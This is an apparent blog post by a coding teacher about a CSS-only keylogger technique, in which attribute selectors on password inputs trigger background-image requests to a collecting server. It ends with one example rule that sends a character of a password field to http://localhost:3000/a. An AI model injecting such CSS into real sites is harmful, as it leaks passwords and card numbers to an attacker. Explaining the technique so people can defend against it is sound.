CSS Hacking: The Surprise of February

To some it may have popped up earlier than 2018, for me it was quite new. I walked into the office after a week of teaching children how to code. Since the age group, the choice for HTML & CSS was more than acceptable. But to my surprise I may have got them way closer to writing their first sort of keylogger then I thought. A few of the kids who were accelerating the past 4 days had their first steps within Javascript and Angular. But even without Javascript knowledge, it is possible to log keys. The method is very creative.I am going to show the method which I found on GitHub. Now there are a few things to keep in mind ahead.

1. It's not system-wide

2. it is also really specific on what data you can obtain in this method.

3. It is still dangerous, data like passwords and credit card numbers can be stolen.

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following css will select all input's with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

The css-code

input[type="password"][value$="a"] {  background-image: url("http://localhost:3000/a");}